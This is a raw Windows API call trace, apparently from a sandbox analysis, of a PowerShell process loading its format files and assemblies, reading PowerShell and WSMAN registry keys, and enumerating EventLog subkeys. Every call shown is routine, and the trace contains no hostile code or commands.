	[0759.315] ReadFile (in: hFile=0x310, lpBuffer=0x2e82040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2e82040*, lpNumberOfBytesRead=0xed018*=0x8b4, lpOverlapped=0x0) returned 1
	[0759.315] ReadFile (in: hFile=0x310, lpBuffer=0x2e81cb4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2e81cb4*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0759.315] ReadFile (in: hFile=0x310, lpBuffer=0x2e82040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2e82040*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0759.316] CloseHandle (hObject=0x310) returned 1
	[0759.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0759.316] SetErrorMode (uMode=0x1) returned 0x1
	[0759.316] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0759.316] SetErrorMode (uMode=0x1) returned 0x1
	[0759.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0759.316] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x310) returned 0x0
	[0759.317] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0759.317] CoTaskMemAlloc (cb=0x5a) returned 0x39aab0
	[0759.317] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x39aab0, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0759.317] CoTaskMemFree (pv=0x39aab0) 
	[0759.317] RegCloseKey (hKey=0x310) returned 0x0
	[0759.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0759.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0759.324] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x49fca645, Data2=0x9e75, Data3=0x4976, Data4=([0]=0x86, [1]=0x2, [2]=0x3b, [3]=0xde, [4]=0xc5, [5]=0xf6, [6]=0x36, [7]=0x40))) returned 0x0
	[0759.324] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x1b8c2e3a, Data2=0xd9ee, Data3=0x4320, Data4=([0]=0xbc, [1]=0xd6, [2]=0xa8, [3]=0x5b, [4]=0x6a, [5]=0x57, [6]=0x18, [7]=0x3f))) returned 0x0
	[0759.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0759.325] SetErrorMode (uMode=0x1) returned 0x1
	[0759.326] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0759.326] GetFileType (hFile=0x310) returned 0x1
	[0759.326] SetErrorMode (uMode=0x1) returned 0x1
	[0759.326] GetFileType (hFile=0x310) returned 0x1
	[0759.326] ReadFile (in: hFile=0x310, lpBuffer=0x2eb8b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2eb8b40*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.326] ReadFile (in: hFile=0x310, lpBuffer=0x2eb8b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2eb8b40*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.326] ReadFile (in: hFile=0x310, lpBuffer=0x2eb8b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2eb8b40*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.327] ReadFile (in: hFile=0x310, lpBuffer=0x2eb8b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2eb8b40*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0759.327] ReadFile (in: hFile=0x310, lpBuffer=0x2eb8b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2eb8b40*, lpNumberOfBytesRead=0xed018*=0xe98, lpOverlapped=0x0) returned 1
	[0759.327] ReadFile (in: hFile=0x310, lpBuffer=0x2eb8140, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2eb8140*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0759.327] ReadFile (in: hFile=0x310, lpBuffer=0x2eb8b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x2eb8b40*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0759.327] CloseHandle (hObject=0x310) returned 1
	[0759.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0759.327] SetErrorMode (uMode=0x1) returned 0x1
	[0759.328] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0759.328] SetErrorMode (uMode=0x1) returned 0x1
	[0759.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0759.328] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x310) returned 0x0
	[0760.649] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0760.649] CoTaskMemAlloc (cb=0x5a) returned 0x39aab0
	[0760.649] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x39aab0, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0760.649] CoTaskMemFree (pv=0x39aab0) 
	[0760.649] RegCloseKey (hKey=0x310) returned 0x0
	[0760.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0760.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0760.650] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0760.651] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x651d0252, Data2=0xc2b6, Data3=0x4919, Data4=([0]=0x81, [1]=0x49, [2]=0x6f, [3]=0x30, [4]=0x5d, [5]=0xca, [6]=0x29, [7]=0xcc))) returned 0x0
	[0760.652] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xbbe72b77, Data2=0x86f3, Data3=0x441e, Data4=([0]=0xbf, [1]=0x78, [2]=0x83, [3]=0x77, [4]=0x65, [5]=0xf0, [6]=0xea, [7]=0x25))) returned 0x0
	[0760.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0760.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0760.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0760.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0760.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0760.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0760.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0760.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0760.689] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0760.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.689] CoTaskMemFree (pv=0x1b6e3460) 
	[0761.574] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0761.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.574] CoTaskMemFree (pv=0x1b6e3460) 
	[0761.576] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0761.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.576] CoTaskMemFree (pv=0x1b6e3460) 
	[0761.577] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0761.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.578] CoTaskMemFree (pv=0x1b6e3460) 
	[0761.582] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0761.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.582] CoTaskMemFree (pv=0x1b6e3460) 
	[0761.586] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0761.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.586] CoTaskMemFree (pv=0x1b6e3460) 
	[0761.586] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0761.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.587] CoTaskMemFree (pv=0x1b6e3460) 
	[0761.591] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xed2b8 | out: phkResult=0xed2b8*=0x310) returned 0x0
	[0761.592] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed1bc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1b8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0761.592] CoTaskMemFree (pv=0x0) 
	[0761.592] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0761.592] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x343ca0, lpcchValueName=0xed268, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xed268, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0761.592] CoTaskMemFree (pv=0x343ca0) 
	[0761.592] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0761.592] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x343ca0, lpcchValueName=0xed268, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xed268, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0761.593] CoTaskMemFree (pv=0x343ca0) 
	[0761.593] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0761.593] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x343ca0, lpcchValueName=0xed268, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xed268, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0761.593] CoTaskMemFree (pv=0x343ca0) 
	[0761.593] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed24c, lpData=0x0, lpcbData=0xed248*=0x0 | out: lpType=0xed24c*=0x1, lpData=0x0, lpcbData=0xed248*=0x8) returned 0x0
	[0761.593] CoTaskMemAlloc (cb=0xc) returned 0x3a7ef0
	[0761.593] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed21c, lpData=0x3a7ef0, lpcbData=0xed218*=0x8 | out: lpType=0xed21c*=0x1, lpData="2.0", lpcbData=0xed218*=0x8) returned 0x0
	[0761.593] CoTaskMemFree (pv=0x3a7ef0) 
	[0774.987] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xed208 | out: phkResult=0xed208*=0x31c) returned 0x0
	[0774.987] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed10c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed108, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed10c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed108*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0774.987] CoTaskMemFree (pv=0x0) 
	[0774.987] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0774.987] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x343ca0, lpcchValueName=0xed1b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xed1b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0774.988] CoTaskMemFree (pv=0x343ca0) 
	[0774.988] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0774.988] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x343ca0, lpcchValueName=0xed1b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xed1b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0774.988] CoTaskMemFree (pv=0x343ca0) 
	[0774.988] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0774.988] RegEnumValueW (in: hKey=0x31c, dwIndex=0x2, lpValueName=0x343ca0, lpcchValueName=0xed1b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xed1b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0774.988] CoTaskMemFree (pv=0x343ca0) 
	[0774.988] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed19c, lpData=0x0, lpcbData=0xed198*=0x0 | out: lpType=0xed19c*=0x1, lpData=0x0, lpcbData=0xed198*=0x8) returned 0x0
	[0774.988] CoTaskMemAlloc (cb=0xc) returned 0x3a8130
	[0774.988] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0xed16c, lpData=0x3a8130, lpcbData=0xed168*=0x8 | out: lpType=0xed16c*=0x1, lpData="2.0", lpcbData=0xed168*=0x8) returned 0x0
	[0774.988] CoTaskMemFree (pv=0x3a8130) 
	[0774.990] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0774.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0774.990] CoTaskMemFree (pv=0x1b6e3460) 
	[0774.995] CoTaskMemAlloc (cb=0x104) returned 0x1b6e3460
	[0774.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b6e3460, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0774.995] CoTaskMemFree (pv=0x1b6e3460) 
	[0775.001] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xed238 | out: phkResult=0xed238*=0x324) returned 0x0
	[0775.005] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xed1ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xed1ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xed1a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.005] CoTaskMemFree (pv=0x0) 
	[0775.006] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0775.006] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x343ca0, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.006] CoTaskMemFree (pv=0x343ca0) 
	[0775.006] CoTaskMemFree (pv=0x0) 
	[0775.006] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0775.006] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x343ca0, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.006] CoTaskMemFree (pv=0x343ca0) 
	[0775.006] CoTaskMemFree (pv=0x0) 
	[0775.006] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0775.006] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x343ca0, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.006] CoTaskMemFree (pv=0x343ca0) 
	[0775.006] CoTaskMemFree (pv=0x0) 
	[0775.006] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0775.006] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x343ca0, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.006] CoTaskMemFree (pv=0x343ca0) 
	[0775.006] CoTaskMemFree (pv=0x0) 
	[0775.006] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0775.006] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x343ca0, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.006] CoTaskMemFree (pv=0x343ca0) 
	[0775.007] CoTaskMemFree (pv=0x0) 
	[0775.007] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0775.007] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x343ca0, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.007] CoTaskMemFree (pv=0x343ca0) 
	[0775.007] CoTaskMemFree (pv=0x0) 
	[0775.007] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
	[0775.007] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x343ca0, lpcchName=0xed238, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xed238, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0775.007] CoTaskMemFree (pv=0x343ca0) 
	[0775.007] CoTaskMemFree (pv=0x0) 
	[0775.007] CoTaskMemAlloc (cb=0x204) returned 0x343ca0
